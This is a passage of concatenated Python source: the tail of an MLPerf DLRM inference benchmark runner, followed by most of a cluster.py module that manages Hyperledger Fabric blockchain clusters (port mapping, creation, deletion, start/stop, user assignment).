except Exception as ex: # pylint: disable=broad-except
log.error("thread: failed, %s", ex)
# since post_process will not run, fake empty responses
processed_results = [[]] * len(qitem.query_id)
finally:
response_array_refs = []
response = []
for idx, query_id in enumerate(qitem.query_id):
# NOTE: processed_results returned by DlrmPostProcess store both
# result = processed_results[idx][0] and target = processed_results[idx][1]
# also each idx might be a query of samples, rather than a single sample
# depending on the --samples-to-aggregate* arguments.
s_idx = qitem.idx_offsets[idx]
e_idx = qitem.idx_offsets[idx + 1]
# debug prints
# print("s,e:",s_idx,e_idx, len(processed_results))
response_array = array.array("B", np.array(processed_results[s_idx:e_idx], np.float32).tobytes())
response_array_refs.append(response_array)
bi = response_array.buffer_info()
response.append(lg.QuerySampleResponse(query_id, bi[0], bi[1]))
lg.QuerySamplesComplete(response)
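# NOTE: lg.QuerySampleResponse takes a raw (id, address, size) triple;
# array.buffer_info() supplies the address and length, and response_array_refs
# keeps the arrays alive until lg.QuerySamplesComplete has consumed them.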
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
query_len = len(query_samples)
if query_len < self.max_batchsize:
batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets = self.ds.get_samples(idx)
self.run_one_item(Item(query_id, idx, batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets))
else:
bs = self.max_batchsize
for i in range(0, query_len, bs):
ie = min(i + bs, query_len)
batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets = self.ds.get_samples(idx[i:ie])
self.run_one_item(Item(query_id[i:ie], idx[i:ie], batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets))
def finish(self):
pass
class QueueRunner(RunnerBase):
def __init__(self, model, ds, threads, post_proc=None, max_batchsize=128):
super().__init__(model, ds, threads, post_proc, max_batchsize)
queue_size_multiplier = 4  # alternatively: (args.samples_per_query_offline + max_batchsize - 1) // max_batchsize
self.tasks = JoinableQueue(maxsize=threads * queue_size_multiplier)
self.workers = []
self.result_dict = {}
for _ in range(self.threads):
worker = threading.Thread(target=self.handle_tasks, args=(self.tasks,))
worker.daemon = True
self.workers.append(worker)
worker.start()
def handle_tasks(self, tasks_queue):
"""Worker thread."""
while True:
qitem = tasks_queue.get()
if qitem is None:
# None in the queue indicates the parent wants us to exit
tasks_queue.task_done()
break
self.run_one_item(qitem)
tasks_queue.task_done()
def enqueue(self, query_samples):
idx = [q.index for q in query_samples]
query_id = [q.id for q in query_samples]
query_len = len(query_samples)
if query_len < self.max_batchsize:
batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets = self.ds.get_samples(idx)
self.tasks.put(Item(query_id, idx, batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets))
else:
bs = self.max_batchsize
for i in range(0, query_len, bs):
ie = min(i + bs, query_len)
batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets = self.ds.get_samples(idx[i:ie])
self.tasks.put(Item(query_id[i:ie], idx[i:ie], batch_dense_X, batch_lS_o, batch_lS_i, batch_T, idx_offsets))
def finish(self):
# exit all threads
for _ in self.workers:
self.tasks.put(None)
for worker in self.workers:
worker.join()
def add_results(final_results, name, result_dict, result_list, took, show_accuracy=False):
percentiles = [50., 80., 90., 95., 99., 99.9]
buckets = np.percentile(result_list, percentiles).tolist()
buckets_str = ",".join(["{}:{:.4f}".format(p, b) for p, b in zip(percentiles, buckets)])
if result_dict["total"] == 0:
result_dict["total"] = len(result_list)
# this is what we record for each run
result = {
"took": took,
"mean": np.mean(result_list),
"percentiles": {str(k): v for k, v in zip(percentiles, buckets)},
"qps": len(result_list) / took,
"count": len(result_list),
"good_items": result_dict["good"],
"total_items": result_dict["total"],
}
acc_str = ""
if show_accuracy:
result["accuracy"] = 100. * result_dict["good"] / result_dict["total"]
acc_str = ", acc={:.3f}%".format(result["accuracy"])
if "roc_auc" in result_dict:
result["roc_auc"] = 100. * result_dict["roc_auc"]
acc_str += ", auc={:.3f}%".format(result["roc_auc"])
# add the result to the result dict
final_results[name] = result
# to stdout
print("{} qps={:.2f}, mean={:.4f}, time={:.3f}{}, queries={}, tiles={}".format(
name, result["qps"], result["mean"], took, acc_str,
len(result_list), buckets_str))
def main():
global last_timeing
args = get_args()
log.info(args)
# find backend
backend = get_backend(args.backend, args.dataset, args.max_ind_range, args.data_sub_sample_rate, args.use_gpu)
# dataset to use
wanted_dataset, pre_proc, post_proc, kwargs = SUPPORTED_DATASETS[args.dataset]
# --count-samples can be used to limit the number of samples used for testing
ds = wanted_dataset(data_path=args.dataset_path,
name=args.dataset,
pre_process=pre_proc, # currently an identity function
use_cache=args.cache, # currently not used
count=args.count_samples,
samples_to_aggregate_fix=args.samples_to_aggregate_fix,
samples_to_aggregate_min=args.samples_to_aggregate_min,
samples_to_aggregate_max=args.samples_to_aggregate_max,
samples_to_aggregate_quantile_file=args.samples_to_aggregate_quantile_file,
samples_to_aggregate_trace_file=args.samples_to_aggregate_trace_file,
test_num_workers=args.test_num_workers,
max_ind_range=args.max_ind_range,
sub_sample_rate=args.data_sub_sample_rate,
mlperf_bin_loader=args.mlperf_bin_loader,
**kwargs)
# load model to backend
model = backend.load(args.model_path, inputs=args.inputs, outputs=args.outputs)
final_results = {
"runtime": model.name(),
"version": model.version(),
"time": int(time.time()),
"cmdline": str(args),
}
mlperf_conf = os.path.abspath(args.mlperf_conf)
if not os.path.exists(mlperf_conf):
log.error("{} not found".format(mlperf_conf))
sys.exit(1)
user_conf = os.path.abspath(args.user_conf)
if not os.path.exists(user_conf):
log.error("{} not found".format(user_conf))
sys.exit(1)
if args.output:
output_dir = os.path.abspath(args.output)
os.makedirs(output_dir, exist_ok=True)
os.chdir(output_dir)
#
# make one pass over the dataset to validate accuracy
#
count = ds.get_item_count()
# warmup
ds.load_query_samples([0])
for _ in range(5):
batch_dense_X, batch_lS_o, batch_lS_i, _, _ = ds.get_samples([0])
_ = backend.predict(batch_dense_X, batch_lS_o, batch_lS_i)
ds.unload_query_samples(None)
scenario = SCENARIO_MAP[args.scenario]
runner_map = {
lg.TestScenario.SingleStream: RunnerBase,
lg.TestScenario.MultiStream: QueueRunner,
lg.TestScenario.Server: QueueRunner,
lg.TestScenario.Offline: QueueRunner
}
runner = runner_map[scenario](model, ds, args.threads, post_proc=post_proc, max_batchsize=args.max_batchsize)
def issue_queries(query_samples):
runner.enqueue(query_samples)
def flush_queries():
pass
def process_latencies(latencies_ns):
# called by loadgen to show us the recorded latencies
global last_timeing
last_timeing = [t / NANO_SEC for t in latencies_ns]
settings = lg.TestSettings()
settings.FromConfig(mlperf_conf, args.model_path, args.scenario)
settings.FromConfig(user_conf, args.model_path, args.scenario)
settings.scenario = scenario
settings.mode = lg.TestMode.PerformanceOnly
if args.accuracy:
settings.mode = lg.TestMode.AccuracyOnly
if args.find_peak_performance:
settings.mode = lg.TestMode.FindPeakPerformance
if args.duration:
settings.min_duration_ms = args.duration
settings.max_duration_ms = args.duration
if args.target_qps:
settings.server_target_qps = float(args.target_qps)
settings.offline_expected_qps = float(args.target_qps)
if args.count_queries:
settings.min_query_count = args.count_queries
settings.max_query_count = args.count_queries
if args.samples_per_query_multistream:
settings.multi_stream_samples_per_query = args.samples_per_query_multistream
if args.max_latency:
settings.server_target_latency_ns = int(args.max_latency * NANO_SEC)
settings.multi_stream_target_latency_ns = int(args.max_latency * NANO_SEC)
sut = lg.ConstructSUT(issue_queries, flush_queries, process_latencies)
qsl = lg.ConstructQSL(count, min(count, args.samples_per_query_offline), ds.load_query_samples, ds.unload_query_samples)
log.info("starting {}".format(scenario))
result_dict = {"good": 0, "total": 0, "roc_auc": 0, "scenario": str(scenario)}
runner.start_run(result_dict, args.accuracy)
lg.StartTest(sut, qsl, settings)
if not last_timeing:
last_timeing = runner.result_timing
if args.accuracy:
post_proc.finalize(result_dict, ds, output_dir=args.output)
add_results(final_results, "{}".format(scenario),
result_dict, last_timeing, time.time() - ds.last_loaded, args.accuracy)
runner.finish()
lg.DestroyQSL(qsl)
lg.DestroySUT(sut)
#
# write final results
#
if args.output:
with open("results.json", "w") as f:
json.dump(final_results, f, sort_keys=True, indent=4)
if __name__ == "__main__":
main()
|
cluster.py |
# Copyright IBM Corp, All Rights Reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
import datetime
import logging
import os
import sys
import time
from uuid import uuid4
from threading import Thread
import socket
import requests
from pymongo.collection import ReturnDocument
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
from agent import get_swarm_node_ip, KubernetesHost
from common import db, log_handler, LOG_LEVEL, utils
from common import CLUSTER_PORT_START, CLUSTER_PORT_STEP, \
NETWORK_TYPE_FABRIC_PRE_V1, NETWORK_TYPE_FABRIC_V1, \
CONSENSUS_PLUGINS_FABRIC_V1, NETWORK_TYPE_FABRIC_V1_1, \
WORKER_TYPES, WORKER_TYPE_DOCKER, WORKER_TYPE_SWARM, WORKER_TYPE_K8S, \
WORKER_TYPE_VSPHERE, VMIP, \
NETWORK_SIZE_FABRIC_PRE_V1, \
PEER_SERVICE_PORTS, EXPLORER_PORTS, \
ORDERER_SERVICE_PORTS, \
NETWORK_STATUS_CREATING, NETWORK_STATUS_RUNNING, NETWORK_STATUS_DELETING
from common import FabricPreNetworkConfig, FabricV1NetworkConfig
from modules import host
from agent import ClusterOnDocker, ClusterOnVsphere, ClusterOnKubernetes
from modules.models.host import Cluster as ClusterModel
from modules.models.host import Host as HostModel
from modules.models.host import ClusterSchema, CLUSTER_STATE, \
Container, ServicePort
logger = logging.getLogger(__name__)
logger.setLevel(LOG_LEVEL)
logger.addHandler(log_handler)
peer_service_ports = {
'peer{}_org{}_grpc': 7051,
'peer{}_org{}_event': 7053,
}
ca_service_ports = {
'ca_org{}_ecap': 7054,
}
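# NOTE: the '{}' placeholders in the service-port keys above are filled with
# peer/org indices inside gen_ports_mapping(), e.g. 'peer0_org1_grpc'.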
class ClusterHandler(object):
""" Main handler to operate the cluster in pool
"""
def __init__(self):
self.col_active = db["cluster_active"]
self.col_released = db["cluster_released"]
self.host_handler = host.host_handler
self.cluster_agents = {
'docker': ClusterOnDocker(),
'swarm': ClusterOnDocker(),
'vsphere': ClusterOnVsphere(),
'kubernetes': ClusterOnKubernetes()
}
def list(self, filter_data={}, col_name="active"):
""" List clusters with given criteria
:param filter_data: dict with the filter properties
:param col_name: Use data in which col_name
:return: list of serialized doc
"""
result = []
if col_name in [e.name for e in CLUSTER_STATE]:
logger.debug("List all {} clusters".format(col_name))
filter_data.update({
"state": col_name
})
clusters = ClusterModel.objects(__raw__=filter_data)
result = self._schema(clusters, many=True)
else:
logger.warning("Unknown cluster col_name=" + col_name)
return result
def get_by_id(self, id, col_name="active"):
""" Get a cluster for the external request
:param id: id of the doc
:param col_name: collection to check
:return: serialized result or obj
"""
try:
state = CLUSTER_STATE.active.name if \
col_name != CLUSTER_STATE.released.name else \
CLUSTER_STATE.released.name
logger.info("find state {} cluster".format(state))
cluster = ClusterModel.objects.get(id=id, state=state)
except Exception:
logger.warning("No cluster found with id=" + id)
return {}
return self._schema(cluster)
def gen_service_urls(self, cid, peer_ports, ca_ports, orderer_ports,
explorer_ports):
"""
Generate the service urls based on the mapping ports
:param cid: cluster id to operate with
:param peer_ports: peer ports mapping
:param ca_ports: ca ports mapping
:param orderer_ports: orderer ports mapping
:param explorer_ports: explorer ports mapping
:return: service url mapping. {} means failure
"""
access_peer = 'peer0.org1.example.com'
access_ca = 'ca.example.com'
peer_host_ip = self._get_service_ip(cid, access_peer)
# explorer_host_ip = self._get_service_ip(cid, access_explorer)
# no api_url, then clean and return
if not peer_host_ip: # not valid api_url
logger.error("Error to find peer host url, cleanup")
self.delete(id=cid, record=False, forced=True)
return {}
ca_host_ip = self._get_service_ip(cid, access_ca)
service_urls = {}
for k, v in peer_ports.items():
service_urls[k] = "{}:{}".format(peer_host_ip, v)
for k, v in ca_ports.items():
service_urls[k] = "{}:{}".format(ca_host_ip, v)
for k, v in orderer_ports.items():
service_urls[k] = "{}:{}".format(ca_host_ip, v)
for k, v in explorer_ports.items():
service_urls[k] = "{}:{}".format(peer_host_ip, v)
return service_urls
def gen_ports_mapping(self, peer_num, ca_num, start_port, host_id):
"""
Generate the ports and service mapping for given size of network
:param peer_num: number of peers
:param ca_num: number of cas
:param start_port: mapping range start with
:param host_id: find ports at which host
:return: the mapping ports, empty means failure
"""
request_port_num = \
peer_num * (len(peer_service_ports.items())) + \
ca_num * len(ca_service_ports.items()) + \
len(ORDERER_SERVICE_PORTS.items()) + \
len(EXPLORER_PORTS.items())
logger.debug("request port number {}".format(request_port_num))
if start_port <= 0: # need to dynamic find available ports
ports = self.find_free_start_ports(host_id, request_port_num)
else:
ports = list(range(start_port, start_port + request_port_num))
if not ports:
logger.warning("No free port is found")
return {}, {}, {}, {}, {}
else:
logger.debug("ports {}".format(ports))
peer_ports, ca_ports, orderer_ports = {}, {}, {}
explorer_ports, all_ports = {}, {}
if peer_num > 1:
org_num_list = [1, 2]
peer_num_end = int(peer_num / 2)
else:
org_num_list = [1]
peer_num_end = 1
logger.debug("org num list {} peer_num_end {}".
format(org_num_list, peer_num_end))
pos = 0
for org_num in org_num_list: # map peer ports
for peer_num in range(0, peer_num_end):
for k, v in peer_service_ports.items():
peer_ports[k.format(peer_num, org_num)] = ports[pos]
logger.debug("pos {}".format(pos))
pos += 1
for org_num in org_num_list: # map ca ports
for k, v in ca_service_ports.items():
ca_ports[k.format(org_num)] = ports[pos]
logger.debug("pos={}".format(pos))
pos += 1
for k, v in ORDERER_SERVICE_PORTS.items(): # orderer ports
orderer_ports[k] = ports[pos]
logger.debug("pos={}".format(pos))
pos += 1
for k, v in EXPLORER_PORTS.items(): # explorer ports
explorer_ports[k] = ports[pos]
pos += 1
all_ports.update(peer_ports)
all_ports.update(ca_ports)
all_ports.update(orderer_ports)
all_ports.update(explorer_ports)
return all_ports, peer_ports, ca_ports, orderer_ports, explorer_ports
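# NOTE: worked example, assuming peer_num=4, ca_num=2, start_port=7050: the two
# orgs each get peers 0..1, so the peer ports come out consecutively as
# peer0_org1_grpc=7050, peer0_org1_event=7051, peer1_org1_grpc=7052, ..., with
# the CA, orderer and explorer ports taken from the same list right after.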
def _create_cluster(self, cluster, cid, mapped_ports, worker, config,
user_id, peer_ports, ca_ports, orderer_ports,
explorer_ports):
# start compose project, failed then clean and return
logger.debug("Start compose project with name={}".format(cid))
containers = self.cluster_agents[worker.type] \
.create(cid, mapped_ports, self.host_handler.schema(worker),
config=config, user_id=user_id)
if not containers:
logger.warning("failed to start cluster={}, then delete"
.format(cluster.name))
self.delete(id=cid, record=False, forced=True)
return None
# creation done, update the container table in db
for k, v in containers.items():
container = Container(id=v, name=k, cluster=cluster)
container.save()
# service urls can only be calculated after service is created
if worker.type == WORKER_TYPE_K8S:
service_urls = self.cluster_agents[worker.type]\
.get_services_urls(cid)
else:
service_urls = self.gen_service_urls(cid, peer_ports, ca_ports,
orderer_ports, explorer_ports)
# update the service port table in db
for k, v in service_urls.items():
service_port = ServicePort(name=k, ip=v.split(":")[0],
port=int(v.split(":")[1]),
cluster=cluster)
service_port.save()
# update api_url, container, user_id and status
self.db_update_one(
{"id": cid},
{
"user_id": user_id,
'api_url': service_urls.get('rest', ""),
'service_url': service_urls,
'status': NETWORK_STATUS_RUNNING
}
)
def check_health_work(cid):
time.sleep(60)
self.refresh_health(cid)
t = Thread(target=check_health_work, args=(cid,))
t.start()
host = HostModel.objects.get(id=worker.id)
host.update(add_to_set__clusters=[cid])
logger.info("Create cluster OK, id={}".format(cid))
def create(self, name, host_id, config, start_port=0,
user_id=""):
""" Create a cluster based on given data
TODO: maybe need other id generation mechanism
Args:
name: name of the cluster
host_id: id of the host URL
config: network configuration
start_port: first service port for cluster, will generate
if not given
user_id: user_id of the cluster if start to be applied
return: Id of the created cluster or None
"""
logger.info("Create cluster {}, host_id={}, config={}, start_port={}, "
"user_id={}".format(name, host_id, config.get_data(),
start_port, user_id))
worker = self.host_handler.get_active_host_by_id(host_id)
if not worker:
logger.error("Cannot find available host to create new network")
return None
if ClusterModel.objects(host=worker).count() >= worker.capacity:
logger.warning("host {} is already full".format(host_id))
return None
peer_num = int(config.get_data().get("size", 4))
ca_num = 2 if peer_num > 1 else 1
cid = uuid4().hex
mapped_ports, peer_ports, ca_ports, orderer_ports, explorer_ports = \
self.gen_ports_mapping(peer_num, ca_num, start_port, host_id)
if not mapped_ports:
logger.error("mapped_ports={}".format(mapped_ports))
return None
env_mapped_ports = dict(((k + '_port').upper(), str(v))
for (k, v) in mapped_ports.items())
network_type = config['network_type']
net = { # net is a blockchain network instance
'id': cid,
'name': name,
'user_id': user_id,
'worker_api': worker.worker_api,
'network_type': network_type, # e.g., fabric-1.0
'env': env_mapped_ports,
'status': NETWORK_STATUS_CREATING,
'mapped_ports': mapped_ports,
'service_url': {}, # e.g., {rest: xxx:7050, grpc: xxx:7051}
}
net.update(config.get_data())
# try to start one cluster at the host
cluster = ClusterModel(**net)
cluster.host = worker
cluster.save()
# start cluster creation asynchronously for better user experience.
t = Thread(target=self._create_cluster, args=(cluster, cid,
mapped_ports, worker,
config, user_id,
peer_ports, ca_ports,
orderer_ports,
explorer_ports))
t.start()
return cid
def delete(self, id, record=False, forced=False):
""" Delete a cluster instance
Clean containers, remove db entry. Only operate on active host.
:param id: id of the cluster to delete
:param record: Whether to record into the released collections
:param forced: Whether to removing user-using cluster, for release
:return:
"""
logger.debug("Delete cluster: id={}, forced={}".format(id, forced))
try:
cluster = ClusterModel.objects.get(id=id)
except Exception:
logger.warning("Cannot find cluster {}".format(id))
return False
c = self.db_update_one({"id": id}, {"status": NETWORK_STATUS_DELETING},
after=False)
# we are now safe from a concurrent apply operation
user_id = c.user_id # original user_id
if not forced and user_id != "":
# not forced, and chain is used by normal user, then no process
logger.warning("Cannot delete cluster {} by "
"user {}".format(id, user_id))
cluster.update(
set__user_id=user_id,
upsert=True
)
return False
else:
cluster.update(set__status=NETWORK_STATUS_DELETING, upsert=True)
host_id, worker_api, network_type, consensus_plugin, cluster_size = \
str(c.host.id), c.worker_api, \
c.network_type if c.network_type else NETWORK_TYPE_FABRIC_PRE_V1, \
c.consensus_plugin if c.consensus_plugin else \
CONSENSUS_PLUGINS_FABRIC_V1[0], \
c.size if c.size else NETWORK_SIZE_FABRIC_PRE_V1[0]
# port = api_url.split(":")[-1] or CLUSTER_PORT_START
h = self.host_handler.get_active_host_by_id(host_id)
if not h:
logger.warning("Host {} inactive".format(host_id))
cluster.update(set__user_id=user_id, upsert=True)
return False
if network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(consensus_plugin=consensus_plugin,
size=cluster_size)
elif network_type == NETWORK_TYPE_FABRIC_V1_1:
config = FabricV1NetworkConfig(consensus_plugin=consensus_plugin,
size=cluster_size)
config.network_type = NETWORK_TYPE_FABRIC_V1_1
elif network_type == NETWORK_TYPE_FABRIC_PRE_V1:
config = FabricPreNetworkConfig(consensus_plugin=consensus_plugin,
consensus_mode='',
size=cluster_size)
else:
return False
config.update({
"env": cluster.env
})
delete_result = self.cluster_agents[h.type].delete(id, worker_api,
config)
if not delete_result:
logger.warning("Error to run compose clean work")
cluster.update(set__user_id=user_id, upsert=True)
return False
# remove cluster info from host
logger.info("remove cluster from host, cluster:{}".format(id))
h.update(pull__clusters=id)
c.delete()
return True
def delete_released(self, id):
""" Delete a released cluster record from db
:param id: id of the cluster to delete
:return: True or False
"""
logger.debug("Delete cluster: id={} from release records.".format(id))
self.col_released.find_one_and_delete({"id": id})
return True
def apply_cluster(self, user_id, condition={}, allow_multiple=False):
""" Apply a cluster for a user
:param user_id: which user will apply the cluster
:param condition: the filter to select
:param allow_multiple: Allow multiple chain for each tenant
:return: serialized cluster or None
"""
if not allow_multiple: # check if already having one
filt = {"user_id": user_id, "release_ts": "", "health": "OK"}
filt.update(condition)
c = self.col_active.find_one(filt)
if c:
logger.debug("Already assigned cluster for " + user_id)
return self._schema(c)
logger.debug("Try find available cluster for " + user_id)
cluster = ClusterModel.\
objects(user_id="",
network_type__icontains=condition.get("apply_type",
"fabric"),
size=condition.get("size", 0),
status=NETWORK_STATUS_RUNNING,
health="OK").first()
if cluster:
cluster.update(upsert=True, **{
"user_id": user_id,
"apply_ts": datetime.datetime.now()
})
logger.info("Now have cluster {} at {} for user {}".format(
cluster.id, cluster.host.id, user_id))
return self._schema(cluster)
logger.warning("Not find matched available cluster for " + user_id)
return {}
def release_cluster_for_user(self, user_id):
""" Release all cluster for a user_id.
:param user_id: which user
:return: True or False
"""
logger.debug("release clusters for user_id={}".format(user_id))
c = self.col_active.find({"user_id": user_id, "release_ts": ""})
cluster_ids = list(map(lambda x: x.get("id"), c))
logger.debug("clusters for user {}={}".format(user_id, cluster_ids))
result = True
for cid in cluster_ids:
result = result and self.release_cluster(cid)
return result
def release_cluster(self, cluster_id, record=True):
""" Release a specific cluster.
Release means delete and try best to recreate it with same config.
:param cluster_id: specific cluster to release
:param record: Whether to record this cluster to release table
:return: True or False
"""
c = self.db_update_one(
{"id": cluster_id},
{"release_ts": datetime.datetime.now()})
if not c:
logger.warning("No cluster find for released with id {}".format(
cluster_id))
return True
if not c.release_ts: # not have one
logger.warning("No cluster can be released for id {}".format(
cluster_id))
return False
return self.reset(cluster_id, record)
def start(self, cluster_id):
"""Start a cluster
:param cluster_id: id of cluster to start
:return: Bool
"""
c = self.get_by_id(cluster_id)
if not c:
logger.warning('No cluster found with id={}'.format(cluster_id))
return False
h_id = c.get('host_id')
h = self.host_handler.get_active_host_by_id(h_id)
if not h:
logger.warning('No host found with id={}'.format(h_id))
return False
network_type = c.get('network_type')
if network_type == NETWORK_TYPE_FABRIC_PRE_V1:
config = FabricPreNetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
consensus_mode=c.get('consensus_mode'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1_1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
config.network_type = NETWORK_TYPE_FABRIC_V1_1
else:
return False
result = self.cluster_agents[h.type].start(
name=cluster_id, worker_api=h.worker_api,
mapped_ports=c.get('mapped_ports', PEER_SERVICE_PORTS),
log_type=h.log_type,
log_level=h.log_level,
log_server='',
config=config,
)
if result:
if h.type == WORKER_TYPE_K8S:
service_urls = self.cluster_agents[h.type]\
.get_services_urls(cluster_id)
self.db_update_one({"id": cluster_id},
{'status': 'running',
'api_url': service_urls.get('rest', ""),
'service_url': service_urls})
else:
self.db_update_one({"id": cluster_id},
{'status': 'running'})
return True
else:
return False
def restart(self, cluster_id):
"""Restart a cluster
:param cluster_id: id of cluster to start
:return: Bool
"""
c = self.get_by_id(cluster_id)
if not c:
logger.warning('No cluster found with id={}'.format(cluster_id))
return False
h_id = c.get('host_id')
h = self.host_handler.get_active_host_by_id(h_id)
if not h:
logger.warning('No host found with id={}'.format(h_id))
return False
network_type = c.get('network_type')
if network_type == NETWORK_TYPE_FABRIC_PRE_V1:
config = FabricPreNetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
consensus_mode=c.get('consensus_mode'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1_1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
config.network_type = NETWORK_TYPE_FABRIC_V1_1
else:
return False
result = self.cluster_agents[h.type].restart(
name=cluster_id, worker_api=h.worker_api,
mapped_ports=c.get('mapped_ports', PEER_SERVICE_PORTS),
log_type=h.log_type,
log_level=h.log_level,
log_server='',
config=config,
)
if result:
if h.type == WORKER_TYPE_K8S:
service_urls = self.cluster_agents[h.type]\
.get_services_urls(cluster_id)
self.db_update_one({"id": cluster_id},
{'status': 'running',
'api_url': service_urls.get('rest', ""),
'service_url': service_urls})
else:
self.db_update_one({"id": cluster_id},
{'status': 'running'})
return True
else:
return False
def stop(self, cluster_id):
"""Stop a cluster
:param cluster_id: id of cluster to stop
:return: Bool
"""
c = self.get_by_id(cluster_id)
if not c:
logger.warning('No cluster found with id={}'.format(cluster_id))
return False
h_id = c.get('host_id')
h = self.host_handler.get_active_host_by_id(h_id)
if not h:
logger.warning('No host found with id={}'.format(h_id))
return False
network_type = c.get('network_type')
if network_type == NETWORK_TYPE_FABRIC_PRE_V1:
config = FabricPreNetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
consensus_mode=c.get('consensus_mode'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1_1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
config.network_type = NETWORK_TYPE_FABRIC_V1_1
else:
return False
result = self.cluster_agents[h.type].stop(
name=cluster_id, worker_api=h.worker_api,
mapped_ports=c.get('mapped_ports', PEER_SERVICE_PORTS),
log_type=h.log_type,
log_level=h.log_level,
log_server='',
config=config,
)
if result:
self.db_update_one({"id": cluster_id},
{'status': 'stopped', 'health': ''})
return True
else:
return False
def reset(self, cluster_id, record=False):
"""
Force to reset a chain.
Delete it and recreate with the same configuration.
:param cluster_id: id of the reset cluster
:param record: whether to record into released db
:return:
"""
c = self.get_by_id(cluster_id)
logger.debug("Run recreate_work in background thread")
cluster_name, host_id, network_type, \
= c.get("name"), c.get("host_id"), c.get("network_type")
if not self.delete(cluster_id, record=record, forced=True):
logger.warning("Delete cluster failed with id=" + cluster_id)
return False
network_type = c.get('network_type')
if network_type == NETWORK_TYPE_FABRIC_V1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
elif network_type == NETWORK_TYPE_FABRIC_V1_1:
config = FabricV1NetworkConfig(
consensus_plugin=c.get('consensus_plugin'),
size=c.get('size'))
config.network_type = NETWORK_TYPE_FABRIC_V1_1
else:
return False
if not self.create(name=cluster_name, host_id=host_id, config=config):
logger.warning("Fail to recreate cluster {}".format(cluster_name))
return False
return True
def reset_free_one(self, cluster_id):
"""
Reset some free chain, mostly because it's broken.
:param cluster_id: id to reset
:return: True or False
"""
logger.debug("Try reseting cluster {}".format(cluster_id))
self.db_update_one({"id": cluster_id, "user_id": ""},
{"status": NETWORK_STATUS_DELETING})
return self.reset(cluster_id)
def _serialize(self, doc, keys=('id', 'name', 'user_id', 'host_id',
'network_type',
'consensus_plugin',
'consensus_mode', 'worker_api',
'create_ts', 'apply_ts', 'release_ts',
'duration', 'containers', 'size', 'status',
'health', 'mapped_ports', 'service_url')):
""" Serialize an obj
:param doc: doc to serialize
:param keys: filter which key in the results
:return: serialized obj
"""
result = {}
if doc:
for k in keys:
result[k] = doc.get(k, '')
return result
def _get_service_ip(self, cluster_id, node='peer0'):
"""
Get the node's service ip
:param cluster_id: The name of the cluster
:param node: name of the cluster node
:return: service IP or ""
"""
host_id = self.get_by_id(cluster_id).get("host_id")
host = self.host_handler.get_by_id(host_id)
if not host:
logger.warning("No host found with cluster {}".format(cluster_id))
return ""
worker_api, host_type = host.worker_api, host.type
if host_type not in WORKER_TYPES:
logger.warning("Found invalid host_type=%s".format(host_type))
return ""
# we should diff with simple host and swarm host here
if host_type == WORKER_TYPE_DOCKER: # single
segs = worker_api.split(":") # tcp://x.x.x.x:2375
if len(segs) != 3:
logger.error("Invalid daemon url = ", worker_api)
return ""
host_ip = segs[1][2:]
logger.debug("single host, ip = {}".format(host_ip))
elif host_type == WORKER_TYPE_SWARM: # swarm
host_ip = get_swarm_node_ip(worker_api, "{}_{}".format(
cluster_id, node))
logger.debug("swarm host, ip = {}".format(host_ip))
elif host_type == WORKER_TYPE_VSPHERE:
host_ip = host.vcparam[utils.VMIP]
logger.debug(" host, ip = {}".format(host_ip))
else:
logger.error("Unknown host type = {}".format(host_type))
host_ip = ""
return host_ip
def find_free_start_ports(self, host_id, number):
""" Find the first available port for a new cluster api
This is NOT lock-free. Should keep simple, fast and safe!
Check existing cluster records in the host, find available one.
:param host_id: id of the host
:param number: Number of ports to get
:return: The port list, e.g., [7050, 7150, ...]
"""
logger.debug("Find {} start ports for host {}".format(number, host_id))
if number <= 0:
logger.warning("number {} <= 0".format(number))
return []
host = self.host_handler.get_by_id(host_id)
if not host:
logger.warning("Cannot find host with id={}", host_id)
return ""
clusters_exists = ClusterModel.objects(host=host)
# clusters_valid = list(filter(lambda c: c.get("service_url"),
# clusters_exists))
# ports_existed = list(map(
# lambda c: int(c["service_url"]["rest"].split(":")[-1]),
# clusters_valid))
ports_existed = [service.port for service in
ServicePort.objects(cluster__in=clusters_exists)]
logger.debug("The ports existed: {}".format(ports_existed))
if len(ports_existed) + number >= 1000:
logger.warning("Too much ports are already in used.")
return []
candidates = [CLUSTER_PORT_START + i * CLUSTER_PORT_STEP
for i in range(len(ports_existed) + number)]
result = list(filter(lambda x: x not in ports_existed, candidates))
logger.debug("Free ports are {}".format(result[:number]))
return result[:number]
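# NOTE: candidates lie on a fixed grid (CLUSTER_PORT_START + i * CLUSTER_PORT_STEP);
# generating len(ports_existed) + number of them guarantees that at least
# `number` survive the filter against ports already in use.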
def refresh_health(self, cluster_id, timeout=5):
"""
Check if the peer is healthy by counting its neighbour number
:param cluster_id: id of the cluster
:param timeout: how many seconds to wait for receiving response
:return: True or False
"""
cluster = self.get_by_id(cluster_id)
logger.debug("Cluster ID: {}".format(cluster_id))
